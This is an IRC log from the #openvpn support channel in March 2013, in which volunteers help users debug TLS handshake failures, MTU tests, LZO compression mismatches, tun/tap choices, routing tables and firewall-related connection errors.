[~Meanderin@71-213-186-243.albq.qwest.net] has quit [Ping timeout: 240 seconds] 12:07 < syn4pse> oO 12:09 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 12:12 < savr> http://pastebin.com/uEy9S39B 12:15 < pekster> savr: It's often a firewall problem that prevents the client from failing to establish a connection like that. The client simply never hears back from the server. If your server logs don't show an "initial packet received" message, then you need to figure out why your connection isn't getting to the other side 12:15 < pekster> "prevents the client from establishing" that should have read 12:16 < savr> http://pastebin.com/cLaXsZk3 12:17 < savr> from the server 12:17 < savr> so the server IS getting the packet 12:17 -!- master_o1_master [~master_of@p4FF24A96.dip.t-dialin.net] has joined #openvpn 12:17 < savr> seems like somehow the keys are broken right? 12:18 < pekster> No, certificate errors expltitly state such. Post both the server & client configs 12:18 < rob0> seems like you are not reading. 12:18 < savr> let me google tls handshake lol 12:19 < rob0> sure, have fun. But until the client reaches the server, there is no TLS handshake. 12:20 < savr> that final log was from the server 12:20 < savr> the server is obviously getting something 12:20 < savr> is this handshaking done on port 1194? 12:20 -!- master_of_master [~master_of@p4FF24B3D.dip.t-dialin.net] has quit [Ping timeout: 252 seconds] 12:21 < pekster> Everything is done over a single UDP port 12:21 < pekster> !configs 12:21 <@vpnHelper> "configs" is (#1) please pastebin your client and server configs (with comments removed, you can use `grep -vE '^#|^;|^$' server.conf`), also include which OS and version of openvpn. or (#2) dont forget to include any ccd entries or (#3) on pfSense, see http://www.secure-computing.net/wiki/index.php/OpenVPN/pfSense to obtain your config 12:22 < rob0> You did not paste anything which said "initial packet received". 12:24 < savr> rob0: but the server obviously received a packet according to those logs? 12:24 < savr> http://pastebin.com/QsfYQJte 12:33 < pekster> Could be MTU issues possibly, although it would be nice to see the server log starting from when the client actually connected. Trying to be "clever" and showing only small bits of the log means you get small bits of insight into your problem 12:34 < pekster> Adding --mtu-test to the client lets OpenVPN test the MTU itself, or use standard ping or trace tools to do it yourself 12:35 < savr> hmm sorry... the log seemed like it was repeating it self with the same error 12:36 < savr> umm there is nothing in the log that wasn't already in http://pastebin.com/gEZ9su2s and http://pastebin.com/cLaXsZk3 12:39 -!- Eagleman [~Eagleman@vpn.eagleman.net] has joined #openvpn 12:39 < savr> pekster: just getting a flood of TUN errors 12:39 < savr> Sun Mar 10 02:39:32 2013 read from TUN/TAP : File descriptor in bad state (code=77) 12:41 < savr> command I used was: openvpn --mtu-test --dev tun 12:41 < pekster> You might want to read the manpage and what I wrote a little more carefully 12:41 < pekster> That's not how you use --mtu-test 12:42 -!- Eagleman7 [~Eagleman@vpn.eagleman.net] has joined #openvpn 12:43 < Eagleman7> Are there ways to increase ping ( x3 the normal value ) when using redirect gateway? 12:44 -!- Eagleman [~Eagleman@vpn.eagleman.net] has quit [Ping timeout: 264 seconds] 12:45 < pekster> Eagleman7: What are you trying to do? 12:46 < Eagleman7> Increase the ping for in a multiplayer game 12:46 < pekster> The OpenVPN --ping directive? 12:47 < pekster> If you're talking about traffic flowing across a tunnel, OpenVPN does not care/check/act based on what the packet's contents is 12:47 < Eagleman7> pekster, no, normally i got 150 ping to a server in the usa, in want to increase the ping using some methods in openvpn, so it goes to 450 12:48 < Eagleman7> It sounds a bit weird, normally you want to decrease the ping to a server 12:48 < savr> pekster: there aren't any examples in the manpage... unless I'm reading the wrong version. running just --mtu-test says I need to specify TUN/TAP 12:48 <@plaisthos> if your server is *BSD you can use ipfw 12:48 < Eagleman7> I'm using linux :( 12:49 <@plaisthos> ipfw pipe 1 config delay 250ms bw 1Mbit/s 12:49 <@plaisthos> maybe linux has something similar 12:49 <@plaisthos> try to ask in linux/iptables related channel 12:49 < pekster> iproute2's 'tc' tool is how you do queuing/shaping/traffic control 12:49 < pekster> That's outside the scope of OpenVPN though 12:50 < pekster> savr: You missed the part where it says "add thet --mtu-test option TO YOUR CONFIGURATION" (emphasis mine.) I also said this above in my earlier message 12:50 < Eagleman7> aha, thanks 12:50 < pekster> You cannot just run it from the command line as the line you pasted is not a full configuration 12:50 < savr> pekster: i've added my config 12:51 < pekster> That's not what you said earlier 12:51 < savr> if I ran it blank then I wouldn't have got the error 12:51 < savr> unless configuration means something else from what I think it means 12:51 < savr> somewhat of a noob here 12:52 -!- p3rror [~mezgani@41.140.216.173] has joined #openvpn 12:52 < pekster> Your existing configuration file. You drop in the --mtu-test option and let it run for a few minutes and it returns the largest packet it can get through 12:52 < savr> pekster: yeah doing that just floods me with the tun error above 12:56 < savr> detailed log: http://pastebin.com/Zuc02LqA 12:58 < pekster> You do this on your client, not the server. You also cannot pass a config file without using the --config option unless it is the *only* option after the command 12:59 < pekster> The errors/warnings about not using encryption and failure to open the tun device should have been hints that something was not right 13:00 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Read error: Connection reset by peer] 13:00 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 13:00 < pekster> Here's what a functinal and working server-side log looks like when the client connects: http://paste.kde.org/691436/ 13:01 < savr> ok adding --config let the command run 13:01 < savr> silly me lol 13:02 < savr> I was running it client side at least. 13:02 < pekster> You named your client config 'server.ovpn' ? 13:02 < pekster> That's functional I suppose but confusing 13:03 < savr> lol.... it is so I know the connect is to the server and not somewhere else 13:03 -!- p3rror [~mezgani@41.140.216.173] has quit [Quit: Leaving] 13:04 -!- MeanderingCode_ [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 13:07 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Ping timeout: 255 seconds] 13:09 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 13:09 -!- p3rror [~mezgani@41.140.216.173] has joined #openvpn 13:13 -!- MeanderingCode_ [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Ping timeout: 276 seconds] 13:13 < savr> pekster: http://pastebin.com/vRwPH7zW 13:15 < pekster> Okay, so it still can't get a TLS handshake. For whatever reason, looks like packets are getting lost of mangled on their way to your server and OpenVPN is unable to perform the initial handshake 13:16 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Read error: Connection reset by peer] 13:17 < pekster> of=or 13:19 < savr> interesting... it is failing from my wired connection and 3g connection in china 13:19 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 13:20 < savr> wonder if the great firewall of china has anything to do with it 13:20 < savr> well thank god for ssh proxy 13:22 < savr> guess I'll find out if it is some other problem once I leave china... 13:29 -!- sanfran [~sanfran@108-61-41-219ch.openskytelcom.net] has joined #openvpn 13:33 < savr> thanks pekster good night 13:33 -!- savr [~linux@unaffiliated/rvas] has quit [Quit: Ex-Chat] 13:33 -!- levifig [~levifig@spwn.co] has quit [Excess Flood] 13:34 -!- pa [~pa@unaffiliated/pa] has quit [Ping timeout: 260 seconds] 13:34 -!- levifig [~levifig@spwn.co] has joined #openvpn 13:36 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 13:38 < jzaw> can openvpn work in a qemu-kvm VM ... its a virtual nic ... briged to host nic 13:38 < jzaw> thus a tap0 would be bridged to a bridge in effect 13:39 < jzaw> i mean in bridged mode tap of course 13:40 < rob0> um, the qemu-kvm bridge does not mean that openvpn needs to be bridged ... 13:40 -!- p3rror [~mezgani@41.140.216.173] has quit [Quit: Leaving] 13:40 < jzaw> but at the mo id like to try bridged if i can 13:40 < jzaw> ipv6 amongst other things 13:40 < jzaw> though i hear 2.3.x does that now in routed? 13:41 < rob0> Bridging is usually not a good idea, but I'm not going to try to change your mind. Yes, 2.3 can handle ipv6 with tun. 13:41 < jzaw> you may have just changed my mind ;) 13:42 < jzaw> \0/ 13:42 < jzaw> out of interest ... why do you consider bridging not a good idea? 13:43 < pekster> !tunortap 13:43 <@vpnHelper> "tunortap" is (#1) you ONLY want tap if you need to pass layer2 traffic over the vpn (traffic destined for a MAC address). If you are using IP traffic you want tun. Dont waste the extra overhead. or (#2) and if your reason for wanting tap is windows shares, see !wins or (#3) also remember that if someone gets access to any side of a tap vpn they can use layer2 attacks like arp poisoning against you 13:43 <@vpnHelper> over the vpn or (#4) lan gaming? use tap! or (#5) Normal Android/iOS devices (not rooted/jailbroken) support only tun. 13:44 < jzaw> k thanks 13:45 < jzaw> the reason i ask if tap works in a VM is that im getting a tap0 its getting an ip ... there is some sort of traffic (prob vpn chatter) but i cant ping and cant do owt else down the tap 13:46 < pekster> The host may not allow use of arbitrary IPs by a guest like that 13:48 < jzaw> the vpn ips are real ones from my /26 the host and VM sit on 13:48 < jzaw> just empty spare and unused in a small consecutive block 13:54 -!- pa [~pa@unaffiliated/pa] has joined #openvpn 14:27 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has quit [Quit: Ex-Chat] 14:27 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has joined #openvpn 14:28 -!- Eagleman7 [~Eagleman@vpn.eagleman.net] has quit [Ping timeout: 240 seconds] 14:36 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 240 seconds] 14:39 -!- seraphim [~serap@82.211.19.202] has joined #openvpn 14:41 < Azrael_-> hi 14:42 < seraphim> hi, got some question. set up openvpn server on debian successfully and connected a windows client successfully using the server via iptables NAT as gateway. problem: without VPN bandwidth: 20MBit/s, through VPN: 10-12Mbit/s using the same speed test. the server does definetly have enough bandwith to handle this (full duplex 100mbit uplink). already switched the UDP port to non-default to check whether my provider is slowing it down artificially but it does 14:42 < seraphim> talking about downstream 14:45 < seraphim> anyone got an idea? 14:52 -!- MeanderingCode_ [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 14:53 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Ping timeout: 255 seconds] 14:58 -!- seraphim [~serap@82.211.19.202] has quit [Quit: Here should be a quit message, but there isn´t any. Just imagine there is some.] 15:04 < Eagleman> try the --replay-window 15:04 < Eagleman> ow 15:20 < pekster> verb 4 will show you "replay window backtrack occurred" messages that'll let you know if the replay is an issue and by how much 15:31 < pekster> Further, a better way to test speed is a file transfer to your server with and without the VPN. It could simply be a difference in speedtest results from different physical locations 15:38 -!- sanfran [~sanfran@108-61-41-219ch.openskytelcom.net] has quit [Ping timeout: 276 seconds] 15:42 -!- Orbi [~opera@anon-148-191.vpn.ipredator.se] has joined #openvpn 15:51 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has quit [] 15:59 -!- sanfran [~sanfran@108.61.50.108] has joined #openvpn 16:08 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 16:10 -!- Wulf [~Wulf@unaffiliated/wulf] has quit [Ping timeout: 276 seconds] 16:11 -!- MeanderingCode_ [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Ping timeout: 240 seconds] 16:55 -!- JackWinter [~jack@ppp-256.vo.lu] has quit [Read error: Connection reset by peer] 16:57 -!- JackWinter [~jack@ppp-256.vo.lu] has joined #openvpn 17:05 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 17:05 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host] 17:05 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 17:05 -!- mode/#openvpn [+o krzee] by ChanServ 17:06 -!- Orbi [~opera@anon-148-191.vpn.ipredator.se] has left #openvpn [] 17:54 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 18:06 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Read error: Connection reset by peer] 18:06 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 18:06 -!- emmanuelux [~emmanuelu@94.23.150.162] has joined #openvpn 18:08 -!- syn4pse- [~syn@p5DDC041D.dip0.t-ipconnect.de] has joined #openvpn 18:12 -!- syn4pse [~syn@p5DDC0186.dip0.t-ipconnect.de] has quit [Ping timeout: 248 seconds] 18:56 -!- MeanderingCode_ [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 18:59 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Ping timeout: 240 seconds] 19:13 -!- JSharpe [~JSharpe@46.165.208.207] has quit [Quit: Leaving] 19:16 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [] 19:37 -!- s7r [~s7r@openvpn/user/s7r] has left #openvpn [] 20:09 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 20:10 -!- MeanderingCode_ [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Ping timeout: 255 seconds] 20:11 -!- Devastator- is now known as Devastator 20:25 -!- p3rror [~mezgani@41.140.216.173] has joined #openvpn 20:40 -!- Valcorb|| [~Valcorb@d54C68BC0.access.telenet.be] has quit [] 20:43 -!- MeanderingCode_ [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 20:45 -!- MeanderingCode__ [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 20:46 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Ping timeout: 240 seconds] 20:48 -!- MeanderingCode_ [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Ping timeout: 252 seconds] 20:53 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 264 seconds] 21:23 -!- cyberspace- [20253@ninthfloor.org] has quit [Ping timeout: 240 seconds] 21:24 -!- kevinsky [~kevin@senna.rosendaal.net] has quit [Ping timeout: 252 seconds] 21:24 -!- kevinsky [~kevin@senna.rosendaal.net] has joined #openvpn 21:24 -!- cyberspace- [20253@ninthfloor.org] has joined #openvpn 21:25 -!- jtrucks [jtrucks@freenode/staff/lopsa.board.jtrucks] has quit [Read error: Connection reset by peer] 21:25 -!- jtrucks_ [jtrucks@freenode/staff/lopsa.board.jtrucks] has joined #openvpn 21:33 -!- jtrucks_ is now known as jtrucks 21:43 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 240 seconds] 22:04 -!- emmanuelux [~emmanuelu@94.23.150.162] has quit [Ping timeout: 248 seconds] 22:23 -!- mnathani [~mnathani@198-84-231-11.cpe.teksavvy.com] has joined #openvpn 22:25 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 22:29 -!- MeanderingCode__ [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Ping timeout: 248 seconds] 22:34 -!- xtz [xtz@DeathStar.Techn0.eu] has quit [Quit: Lost terminal] 23:02 -!- MeanderingCode_ [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 23:02 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Ping timeout: 245 seconds] 23:06 -!- sanfran [~sanfran@108.61.50.108] has quit [Ping timeout: 276 seconds] 23:08 -!- sanfran [~sanfran@209-6-38-16.c3-0.smr-ubr1.sbo-smr.ma.cable.rcn.com] has joined #openvpn 23:20 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 23:21 -!- sanfran [~sanfran@209-6-38-16.c3-0.smr-ubr1.sbo-smr.ma.cable.rcn.com] has quit [Ping timeout: 264 seconds] 23:22 -!- sanfran [~sanfran@216.155.131.69] has joined #openvpn 23:23 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Read error: Connection reset by peer] 23:23 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 23:24 -!- MeanderingCode_ [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Ping timeout: 240 seconds] 23:27 -!- MeanderingCode_ [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 23:31 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Ping timeout: 240 seconds] --- Day changed Sun Mar 10 2013 00:00 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit [] 00:37 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 00:38 -!- MeanderingCode_ [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Ping timeout: 245 seconds] 00:58 -!- antiisolo [solo@gateway/shell/anapnea.net/x-doayfdtntkosijyu] has joined #openvpn 00:59 < antiisolo> hello, i just installed openvpn server for the first time, and whenever i connect from the client, i receive this error Bad LZO decompression header byte: 42 00:59 < antiisolo> any ideas? 01:05 -!- Wulf [~Wulf@unaffiliated/wulf] has joined #openvpn 01:33 -!- Orbi [~opera@anon-148-191.vpn.ipredator.se] has joined #openvpn 01:38 < pppingme> antiisolo do you have LZO enabled on *BOTH* ends? 01:56 < antiisolo> pppingme yes 01:58 < pekster> antiisolo: I'm not here much longer tonight, but the lzo paramater needs to match exactly. If you use 'comp-lzo adaptive' it must be the same on the other end 01:59 < pppingme> antiisolo does it seem to work but just getting a lot of those errors, or is it totally broke? 01:59 < pekster> Values of on/off/adaptive (or unspecified completely) should match between peers. Note also that you can push the lzo option from the server, thus insuring it matches (and as an added bonus you can change it centrally later too) 03:01 < antiisolo> pppingme atfirst it was just totally broken, now it just stops at push_request 03:02 < antiisolo> pekster: thanks ill look more into that 03:04 < antiisolo> I have been getting to this Sun Mar 10 04:03:04 2013 client1/71.202.51.90:59635 PUSH: Received control message: 'PUSH_REQUEST' 03:04 < antiisolo> Sun Mar 10 04:03:04 2013 client1/71.202.51.90:59635 SENT CONTROL [client1]: 'PUSH_REPLY,route 192.168.1.0 255.255.255.0,route 10.8.0.1,topology net30,ping 10,ping-restart 120,ifconfig 10.8.0.6 10.8.0.5' (status=1) 03:05 < antiisolo> then it doesnt say anything else.. but no websites work 03:09 -!- jgeboski [~jgeboski@unaffiliated/jgeboski] has quit [Read error: Operation timed out] 03:12 -!- jgeboski [~jgeboski@unaffiliated/jgeboski] has joined #openvpn 03:24 -!- Velua [~JJ@CPE-124-185-181-88.lns6.cha.bigpond.net.au] has joined #openvpn 03:24 < Velua> hey 03:25 < Velua> when i connect to my openvpn server as a client am i meant to be able to ping it at 10.8.0.1? 03:25 < Velua> hello....? 03:25 < pppingme> that would depend on how your server is setup 03:26 < Velua> it's all default, 03:26 < Velua> just did a fresh install.. just curious if that's normal or not..? 03:26 < pppingme> I think thats the default IP, I never use it.. 03:26 < Velua> yeah i think it is too, but when I ping it i get no response.. Is that normal or bad? 03:27 < pppingme> antiisolo are you pushing a default route? what about dns? what error are you getting on the web browser? 03:27 < pppingme> Velua possibly just a bogus firewall rule blocking icmp 03:28 < Velua> okay thanks, I'm also trying to route to another subnet from the VPN's one 03:29 < Velua> I'm just putting the route in my router.. how many hops should I have? 03:29 < Velua> I basically know what a hop is.. but should I have 0 or 1 in it or.. could i get away with 99? like is that just the max it will let happen or what..? 03:30 < Velua> brb 03:30 < pppingme> you're router is asking how many hops? 03:34 -!- Velua [~JJ@CPE-124-185-181-88.lns6.cha.bigpond.net.au] has quit [Ping timeout: 255 seconds] 03:35 < antiisolo> ppingme the browser is just getting a website can not be displayed.. ping says destination is unreachale... 03:35 < pppingme> ok, that would infer dns is ok, and its either routing, or firewall rules 03:36 < pppingme> you're trying to route EVERYTHING over the vpn? like paranoia mode? 03:36 < antiisolo> yeah, was hoping to route all traffic 03:37 < pppingme> do a traceroute to 8.8.8.8 03:37 < pppingme> and paste it 03:38 < pppingme> what OS is the client? 03:39 < antiisolo> traceroute to 8.8.8.8 (8.8.8.8), 30 hops max, 60 byte packets 03:40 < antiisolo> send: Operation not permitted 03:40 < antiisolo> debian 03:41 < pppingme> paste the output of "ip route show" 03:43 < antiisolo> default via 10.8.0.5 dev tun0 proto static 03:43 < antiisolo> 10.8.0.1 via 10.8.0.5 dev tun0 proto static 03:43 < antiisolo> 10.8.0.5 dev tun0 proto kernel scope link src 10.8.0.6 03:43 < antiisolo> 169.254.0.0/16 dev wlan1 scope link metric 1000 03:43 < antiisolo> 173.230.151.8 via 192.168.0.1 dev wlan1 proto static 03:43 < antiisolo> 192.168.0.0/24 dev wlan1 proto kernel scope link src 192.168.0.197 metric 2 03:43 < antiisolo> 192.168.1.0/24 via 10.8.0.5 dev tun0 proto static 03:44 -!- sanfran [~sanfran@216.155.131.69] has quit [Ping timeout: 245 seconds] 03:45 < pppingme> whats the 192.168.1.x about? 03:45 < antiisolo> lol i think i was randomly following a tutorial online 03:45 < pppingme> except for that (which isn't whats breaking you) it looks correct 03:46 < pppingme> that most likely leaves firewall rules, and most likely on the server 03:54 < pppingme> you can paste those if you want someone to look at them 03:57 < pppingme> I'm assuming you have ipforwarding turned ON for the vps? 04:07 < antiisolo> yes 04:11 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 04:11 -!- marisn [~marisn@81.198.6.88] has joined #openvpn 04:16 -!- CEnnis91 [uid3543@gateway/web/irccloud.com/x-txxrmkbetvcozgyg] has quit [Ping timeout: 240 seconds] 04:17 -!- raidz_away [~raidz@openvpn/corp/admin/andrew] has quit [Ping timeout: 240 seconds] 04:17 -!- Dennis84 [~dennis@mail.it-moebius.de] has quit [Ping timeout: 245 seconds] 04:18 < marisn> whom ever removed warnings about \ in config files for 2.3.0 - big thanks. Spent many hours to discover it by installing an older version. 04:18 -!- raidz_away [~raidz@raidz.im] has joined #openvpn 04:18 -!- raidz_away is now known as raidz 04:18 -!- Dennis84 [~dennis@mail.it-moebius.de] has joined #openvpn 04:18 -!- raidz [~raidz@raidz.im] has quit [Changing host] 04:18 -!- raidz [~raidz@openvpn/corp/admin/andrew] has joined #openvpn 04:18 -!- mode/#openvpn [+o raidz] by ChanServ 04:29 -!- marisn [~marisn@81.198.6.88] has quit [Quit: Konversation terminated!] 04:31 -!- catsup [~d@64.111.123.163] has quit [Remote host closed the connection] 04:41 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn 05:11 -!- JSharpe [~JSharpe@46.165.210.17] has joined #openvpn 05:23 -!- Ancient [~ancient@108.59.1.200] has joined #openvpn 05:24 < Ancient> !goal 05:24 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc 05:24 < Ancient> =j ##opeszps 05:26 < Ancient> Can anyone direct me to the bug tracker for the "official" iOS & Android clients? 05:27 -!- Orbi [~opera@anon-148-191.vpn.ipredator.se] has left #openvpn [] 05:34 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 05:45 -!- fluter [~fluter@fedora/fluter] has joined #openvpn 06:00 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Quit: Leaving] 06:02 <@plaisthos> Ancient: is there no link etc. in the apps? 06:13 -!- CEnnis91 [uid3543@gateway/web/irccloud.com/x-otyxzvbrmvapfvtz] has joined #openvpn 06:15 -!- gladiatr [~sdspence@24.124.15.166] has joined #openvpn 06:15 -!- gladiatr [~sdspence@24.124.15.166] has quit [Changing host] 06:15 -!- gladiatr [~sdspence@openvpn/community/support/gladiatr] has joined #openvpn 06:46 < Ancient> plaisthos, I don't have a device capable of running either unfortunately, however I happen to be on the server end of things 06:46 < Ancient> and I have a bug to file accordingly 06:46 < Ancient> So unfortunately, I'm not sure 06:47 < Ancient> I went through the openvpn website, and couldn't find anything either 06:53 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection] 06:54 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 06:57 -!- gladiatr [~sdspence@openvpn/community/support/gladiatr] has quit [Quit: Leaving] 07:46 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 245 seconds] 07:54 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 07:55 -!- JSharpe [~JSharpe@46.165.210.17] has quit [Quit: Leaving] 08:00 -!- mintux [~mrg@unaffiliated/mintux] has joined #openvpn 08:01 < mintux> i installed openvpn on my debian server and in ubuntu client i could not connect i got this error in client: TLS Error: Unroutable control packet received from [AF_INET]192.168.1.12:1194 (si=3 op=P_CONTROL_V1) and in server log i have: TLS Error: TLS handshake failed . TLS Error: TLS key negotiation failed to occur within 60 seconds 08:03 < mintux> it's my server and client config http://codepad.org/Kuc6ma44 08:03 <@vpnHelper> Title: C code - 35 lines - codepad (at codepad.org) 08:29 -!- sanfran [~sanfran@108-61-59-19ch.openskytelcom.net] has joined #openvpn 08:38 < mintux> now i got this error: UDPv4 [ECONNREFUSED]: Connection refused (code=111) on server and output of iptables -L -n -v is : http://codepad.org/ab1iNI6k 08:38 <@vpnHelper> Title: C code - 10 lines - codepad (at codepad.org) 08:38 < mintux> are there body here? 09:16 -!- sanfran [~sanfran@108-61-59-19ch.openskytelcom.net] has quit [Ping timeout: 250 seconds] 09:29 <@ecrist> mintux: that looks like a firewall issue 09:37 < mintux> ecrist: i put every details here https://forums.openvpn.net/topic12399.html 09:37 <@vpnHelper> Title: OpenVPN Support Forum [ECONNREFUSED]: Connection refused (code=111) : Configuration (at forums.openvpn.net) 09:38 <@ecrist> mintux: I don't generally diagnose firewall issues 09:38 <@ecrist> we don't, as a policy in this channel 09:38 <@ecrist> code 111 is almost always caused by a firewall. you need to allow openvpn traffic 09:38 <@EugeneKay> I charge $150/hr for it 09:39 -!- mode/#openvpn [-o EugeneKay] by ecrist 09:39 <@ecrist> now he's half-price 09:39 <@ecrist> :P 09:39 < mintux> ecrist: i did it on iptables 09:39 * EugeneKay cries 09:39 -!- mode/#openvpn [+o EugeneKay] by ChanServ 09:41 < mintux> ecrist: # iptables -L -n 09:41 < mintux> ACCEPT     udp  --  0.0.0.0/0            0.0.0.0/0           udp dpt:1194 09:41 <@EugeneKay> The fact that you're seeing refused on the SERVER means that you have bad rules on the CLIENT. 09:42 <@EugeneKay> The server is getting the initial packet just fine; the response is being refused 09:43 < mintux> EugeneKay: it's my config http://codepad.org/yKmkjslJ and output 09:43 <@vpnHelper> Title: C code - 79 lines - codepad (at codepad.org) 09:43 <@EugeneKay> I really don't care enough to read through it to find the problem 09:43 <@EugeneKay> I have bacon coming soon ^_^ 09:44 <@ecrist> !firewall 09:44 <@vpnHelper> "firewall" is (#1) please see http://openvpn.net/man#lbBD for more info or (#2) see http://www.secure-computing.net/wiki/index.php/OpenVPN/Firewall for brief notes on disabling firewall rulesets. 09:44 <@EugeneKay> I'd say sorry, but I'm never apologetic about bacon. 09:47 < mintux> ecrist: i disabled firewall likes everything wrote in http://www.secure-computing.net/wiki/index.php/OpenVPN/Firewall and not different in output 09:47 <@vpnHelper> Title: OpenVPN/Firewall - Secure Computing Wiki (at www.secure-computing.net) 09:47 <@ecrist> on client AND server? 09:48 < mintux> only on server 09:48 <@ecrist> EugeneKay just told you to do it on your client, as well 09:48 < mintux> i will do it on client also 09:50 < mintux> ecrist: not different same result :-( 09:50 <@EugeneKay> Mmmmmm bacon 09:50 < mintux> TLS Error: Unroutable control packet received from 09:52 * ecrist poofs for the auto show 10:01 -!- fluter [~fluter@fedora/fluter] has quit [Remote host closed the connection] 10:22 -!- Pei [~pei@thinks.outside.theb0x.org] has joined #openvpn 10:24 -!- mintux [~mrg@unaffiliated/mintux] has left #openvpn [] 10:39 -!- mezgani [~mezgani@41.140.174.185] has joined #openvpn 10:42 -!- p3rror [~mezgani@41.140.216.173] has quit [Ping timeout: 245 seconds] 11:13 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 12:08 -!- simcop2387 [~simcop238@p3m/member/simcop2387] has quit [Quit: ZNC - http://znc.sourceforge.net] 12:11 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 240 seconds] 12:11 -!- JSharpe [~JSharpe@46.165.221.13] has joined #openvpn 12:22 -!- erry [erry@freenode/staff/erry] has quit [Changing host] 12:22 -!- erry [erry@happy/birthday/erry] has joined #openvpn 12:22 -!- simcop2387 [~simcop238@p3m/member/simcop2387] has joined #openvpn 12:31 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 12:31 -!- novaflash is now known as novaflash_away 12:36 -!- novaflash_away is now known as novaflash 12:41 -!- JackWinter [~jack@ppp-256.vo.lu] has quit [Quit: ZNC - http://znc.in] 12:43 -!- JackWinter [~jack@ppp-256.vo.lu] has joined #openvpn 12:46 -!- Wulf [~Wulf@unaffiliated/wulf] has quit [Ping timeout: 276 seconds] 12:50 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 248 seconds] 13:00 -!- JackWinter [~jack@ppp-256.vo.lu] has quit [Quit: ZNC - http://znc.in] 13:02 -!- JackWinter [~jack@ppp-256.vo.lu] has joined #openvpn 13:17 -!- master_of_master [~master_of@p4FF24F4B.dip.t-dialin.net] has joined #openvpn 13:18 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 13:20 -!- Valcorb|| [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 13:20 -!- Valcorb|| [~Valcorb@d54C68BC0.access.telenet.be] has quit [Client Quit] 13:20 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Read error: Connection reset by peer] 13:21 -!- master_o1_master [~master_of@p4FF24A96.dip.t-dialin.net] has quit [Ping timeout: 264 seconds] 13:22 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 13:22 -!- Wulf [~Wulf@unaffiliated/wulf] has joined #openvpn 13:29 -!- p3rror [~mezgani@41.248.148.226] has joined #openvpn 13:31 -!- mezgani [~mezgani@41.140.174.185] has quit [Ping timeout: 248 seconds] 13:43 -!- digilink [~digilink@unaffiliated/digilink] 